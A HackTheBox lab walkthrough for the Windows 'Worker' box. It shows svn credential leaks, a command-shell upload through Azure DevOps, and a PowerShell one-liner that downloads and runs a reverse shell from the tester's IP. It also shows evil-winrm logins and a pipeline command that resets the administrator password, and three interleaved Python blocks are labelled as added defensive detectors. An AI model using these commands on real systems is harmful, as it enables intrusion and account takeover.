Worker HackTheBox WalkThrough
This is the Worker HackTheBox walkthrough. In this writeup, I have demonstrated step by step how I rooted the Worker HTB box. Before starting, let us know something about this box. It is a Windows box with IP address 10.10.10.203 and difficulty Medium assigned by its maker.
Before starting, first connect your PC to the VPN and verify connectivity by pinging the IP 10.10.10.203. If all goes well, it is time to start hacking.
As usual, I started by scanning the box. Scanning gives us an idea of how to proceed further: it helps with banner grabbing the services running on different ports, and sometimes it helps with vulnerability scanning as well.
Nmap (port scanner) gave the following result:
$nmap -sC -sV -T4 -oN worker_scan 10.10.10.203
Nmap discovered that ports 80 and 3690 are open. The Microsoft IIS web server is running on port 80 and the svnserve service is running on port 3690. Going to the URL http://10.10.10.203/, I found the default web page of the Microsoft IIS server. I looked through the page source to see whether this website has any hyperlinks to other pages, but got nothing interesting except the link to Microsoft's official page. So I left it there and moved on to enumerate port 3690.
I didn't know anything about the svnserve service, but after some googling I found this interesting article. It explains the svn tool, which is used to remotely access an svn server. After playing with this tool for some time, I got a subdomain dimension.worker.htb and a file:
$svn list --verbose -r 2 svn://10.10.10.203/
After some more enumeration, I found a way to dump the content of the file:
$svn diff -r 2 svn://10.10.10.203/
Got some credentials, nathen : wendel98, and a new subdomain devops.worker.htb. I did not know whose credentials these were but, as usual, added them to my notes; they may be helpful later. Now we have two subdomains, dimension.worker.htb and devops.worker.htb. I added both of them to my hosts file.
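A defender's counterpart to the enumeration above, as an added example that is not part of the original writeup: a small scanner over svn diff output that flags added lines carrying credentials, so a commit like revision 2 would be caught by a review hook before it reaches the server. The diff text is a constructed sample (file name and surrounding lines are invented); only the credential values come from this page.

```python
import re

# Constructed sample of `svn diff -r 2` output, modelled on the leak described
# above. The file name and surrounding lines are invented for this example.
SAMPLE_DIFF = "\n".join([
    "Index: dimension.worker.htb/README.txt",
    "===================================================================",
    "--- dimension.worker.htb/README.txt\t(revision 1)",
    "+++ dimension.worker.htb/README.txt\t(revision 2)",
    "@@ -0,0 +1,4 @@",
    "+Deployment notes",
    "+login: nathen",
    "+password: wendel98",
    "+Site: http://devops.worker.htb",
])

HUNK_RE = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")
# Patterns a reviewer or pre-commit hook would flag in added lines.
SECRET_RES = [
    re.compile(r"(?i)\b(?:password|passwd|pwd|secret|token)\s*[:=]\s*\S+"),
    re.compile(r"(?i)\b(?:login|user(?:name)?)\s*[:=]\s*\S+"),
]

def find_secrets(diff_text):
    """Return (file, new_line_no, text) for each added line that looks like a credential."""
    hits, current_file, line_no = [], None, 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):
            # svn appends "\t(revision N)" to the path; keep only the path
            current_file = raw[4:].split("\t")[0]
            continue
        m = HUNK_RE.match(raw)
        if m:
            line_no = int(m.group(1))   # first line number in the new file
            continue
        if raw.startswith("+"):
            text = raw[1:]
            if any(p.search(text) for p in SECRET_RES):
                hits.append((current_file, line_no, text))
        if not raw.startswith("-"):
            line_no += 1                # context and added lines advance the new-file counter
    return hits

if __name__ == "__main__":
    for path, num, text in find_secrets(SAMPLE_DIFF):
        print(f"{path}:{num}: {text}")
```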
Modified Hosts File
Going to http://dimension.worker.htb/#work, I got some more subdomains: alpha.worker.htb, cartoon.worker.htb, solid-state.worker.htb, spectral.worker.htb, story.worker.htb and lens.worker.htb. I added them all to my hosts file, so my final hosts file looks like the one below.
Modified Hosts File
Going to the subdomains alpha.worker.htb, cartoon.worker.htb, solid-state.worker.htb, spectral.worker.htb, story.worker.htb and lens.worker.htb, I found nothing interesting on any of these pages. So I left them there and went to http://devops.worker.htb, which gave a login page like the one we have in the Tomcat web server. I tried to log in with the credentials nathen:wendel98 and successfully logged in.
Upon login, I found that it is the Microsoft Azure DevOps platform. For more information about Microsoft Azure, you can watch this video. This is a cloud-based service that lets us create and deploy our custom package by directly uploading it to the server.
We will take advantage of this upload-and-deploy feature: we will upload our command shell and deploy it in a branch created by us.
Therefore, to get a shell on my PC I followed these steps.
1. Created a cmdasp.aspx command shell in the spectral folder inside the branch. The command shell can be found in the directory /usr/share/webshells/aspx/ in Kali Linux.
3. Then performed Pull and finally Approved it, respectively.
Once our package is approved, it can be accessed at http://spectral.worker.htb/cmdasp.aspx.
Since we upload the command shell into the spectral directory, it will be accessible at the subdomain spectral.worker.htb. Had we used some other folder like lens to upload our shell, it would be accessible at the subdomain lens.worker.htb.
I did exactly the same steps as described above.
Uploading & Deploying Package
1. Log in to DevOps using the credentials nathen : wendel98
2. Click on
3. On the left pane of the window, click on the Branches option under the Repos menu and click on New Branch to create a new branch.
4. Provide the name as MyBranch1 and then
5. Once the branch is created, click it to open all the files inside the branch.
6. Upload the cmdasp.aspx command shell by choosing Upload files and click on the commit button to commit the upload.
7. Once we have committed successfully, click Create a pull request to pull the commit.
8. Enter anything as the Title and choose Nathalie Henley as the Reviewer. In addition, choose whichever of the two Work Items you want and click on
9. Click on Complete and then Complete Merge. Before clicking on Complete Merge, make sure to uncheck the 2nd option, Delete MyBranch1 after merging. After clicking Complete Merge you will get the following message.
Now all is set. Just go to the URL http://spectral.worker.htb/cmdasp.aspx to access the command shell and confirm the host by executing whoami && ipconfig.
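Since the merged branch becomes the content of a served vhost, the deploy step is where a defender should check for server-side pages that behave like a command shell. The scanner below is an added example (not code from the page or from Azure DevOps); the sample web root it builds is constructed, with an inert cmdasp.aspx stand-in that carries only the indicators being matched.

```python
import pathlib
import re
import tempfile

# File types IIS executes server-side; anything else is treated as static content.
SERVER_SCRIPT_EXT = {".aspx", ".ashx", ".asmx", ".asp"}
INDICATORS = {
    "request_input": re.compile(r"\bRequest(?:\.Form|\.QueryString|\[)"),
    "process_spawn": re.compile(r"\b(?:ProcessStartInfo|Process\.Start|WScript\.Shell)\b"),
    "shell_binary": re.compile(r"(?i)\b(?:cmd\.exe|powershell(?:\.exe)?)\b"),
}

def scan_webroot(root):
    """Return (relative path, indicators) for server-side pages that read request
    input and also spawn a process, the combination a command page shows."""
    findings = []
    for path in sorted(pathlib.Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SERVER_SCRIPT_EXT:
            continue
        text = path.read_text(errors="ignore")
        matched = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if "request_input" in matched and "process_spawn" in matched:
            findings.append((str(path.relative_to(root)), matched))
    return findings

def build_sample_webroot():
    """Constructed stand-in for the site folder the merged branch is deployed to."""
    root = tempfile.mkdtemp(prefix="worker_webroot_")
    # Benign page: no request handling, no process spawn.
    pathlib.Path(root, "index.aspx").write_text('<%@ Page Language="C#" %>\n<h1>Spectral</h1>\n')
    spectral = pathlib.Path(root, "spectral")
    spectral.mkdir()
    # Inert fixture that only carries the indicators the scanner keys on.
    (spectral / "cmdasp.aspx").write_text(
        '<%@ Page Language="C#" %>\n'
        '<% string c = Request.Form["c"]; var p = new ProcessStartInfo("cmd.exe"); %>\n')
    # Static content with the same strings is not executed by IIS and is ignored.
    pathlib.Path(root, "notes.txt").write_text('ProcessStartInfo("cmd.exe") Request["c"]\n')
    return root

if __name__ == "__main__":
    for rel, inds in scan_webroot(build_sample_webroot()):
        print(f"{rel}: {', '.join(inds)}")
```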
Now we have remote command execution. It is time to get a reverse shell in our terminal. There are multiple ways to get a shell; I have used Invoke-PowerShellTcp.ps1 from here.
Getting Shell through RCE
To get a shell I did the following:
1. Downloaded the shell from the above URL
2. Changed the IP address and port number inside the Invoke-PowerShellTcp.ps1 file to my tun0 IP
3. Started a netcat listener locally
4. Started a Python HTTP web server locally
5. Executed the following command in the command shell at http://spectral.worker.htb/cmdasp.aspx
$powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/Invoke-PowerShellTcp.ps1')"
Note: Try refreshing the page http://spectral.worker.htb/cmdasp.aspx 4 to 5 times if you don't get a command shell, because it may take some time to be deployed.
We got a shell. After some initial enumeration, I found a drive W on the Worker machine and, inside the directory W:\svnrepos\www\conf\, a file named passwd. It contains all the svn user credentials, and also the credentials of the user robisl, who is present in the C:\Users\ directory. The credentials are robisl : wolves11.
Tried to log in remotely with these credentials using evil-winrm (a Windows Remote Management tool), and successfully logged in.
Login using Evil-Winrm
$evil-winrm -i 10.10.10.203 -u robisl -p wolves11
Capture User Flag
To escalate privilege I did the following:
1. Logged in to devops.worker.htb using the creds robisl : wolves11
2. Created a new pipeline
3. Then chose "Azure Repos Git" for importing the code
4. Clicked the repository PartsUnlimited, then chose starter pipeline as the platform
5. Finally introduced a custom command inside the script to change the admin password and at last clicked save & run to execute the command.
Following the above steps:
Creating Pipeline & Running Script
1. Click on
2. On the left pane, click on the option
Azure Repos Git
5. Click on
6. Select the platform as starter pipeline
7. Edit the code by adding net user administrator [email protected]. Click save and run. The cmd command which we have introduced into our azure-pipelines.yml file will change the administrator password to [email protected].
8. Type the name as MyPipeline in the review dialog box. Then save and run.
After a successful run, you will see the following window.
Our administrator password has been changed. We can now log in remotely to the Worker machine using evil-winrm with the credentials administrator : [email protected]
$evil-winrm -i 10.10.10.203 -u administrator -p [email protected]
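From the defender's side, the pipeline step above leaves a clear trail in the Windows Security log: a 4688 process-creation event for net.exe under the agent's account and a 4724 password-reset event for Administrator. The detection below is an added example, not from the page; the event records are constructed, the agent service account name svc_buildagent is an assumption, and the password in the sample is invented.

```python
import re

# Constructed sample of Windows Security events as a SIEM would normalise them.
# The agent service account name is an assumption; the password is invented.
EVENTS = [
    {"EventID": 4688, "SubjectUserName": "svc_buildagent",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dotnet build src.csproj"},
    {"EventID": 4688, "SubjectUserName": "svc_buildagent",
     "NewProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user administrator NewPassw0rd!"},
    {"EventID": 4688, "SubjectUserName": "svc_buildagent",
     "NewProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user robisl"},
    {"EventID": 4724, "SubjectUserName": "svc_buildagent",
     "TargetDomainName": "WORKER", "TargetUserName": "Administrator"},
    {"EventID": 4724, "SubjectUserName": "helpdesk01",
     "TargetDomainName": "WORKER", "TargetUserName": "jdoe"},
]

# Accounts the self-hosted agent runs as (assumption) and accounts whose
# password reset should always page someone.
BUILD_ACCOUNTS = {"svc_buildagent"}
PRIVILEGED = {"administrator"}
# `net user <name> <password>` sets a password; a trailing /switch or a missing
# third argument is a query or other operation and is not matched.
NET_USER_SET_PW = re.compile(
    r"(?i)^(?:\S*[\\/])?net1?(?:\.exe)?\s+user\s+(\S+)\s+(?!/)(\S+)")

def detect(events):
    """Return alert strings for password changes driven from the build agent."""
    alerts = []
    for e in events:
        if e["EventID"] == 4688 and e["SubjectUserName"].lower() in BUILD_ACCOUNTS:
            m = NET_USER_SET_PW.match(e.get("CommandLine", ""))
            if m:
                # the password sits in the command line; mask it in the alert text
                alerts.append(f"4688: {e['SubjectUserName']} set password for "
                              f"'{m.group(1)}' via {e['NewProcessName']} (password masked)")
        elif e["EventID"] == 4724 and e["TargetUserName"].lower() in PRIVILEGED:
            alerts.append(f"4724: {e['SubjectUserName']} reset password of "
                          f"{e['TargetDomainName']}\\{e['TargetUserName']}")
    return alerts

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```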
Capture Root Flag
This is how I rooted the Worker HackTheBox machine. I learnt a lot while hunting this box. Hope you guys have also learnt something new from it. Thanks for reading this writeup. For any suggestion or query related to the walkthrough, feel free to contact us at [email protected].
For more HackTheBox walkthroughs, always visit ethicalhacs.com.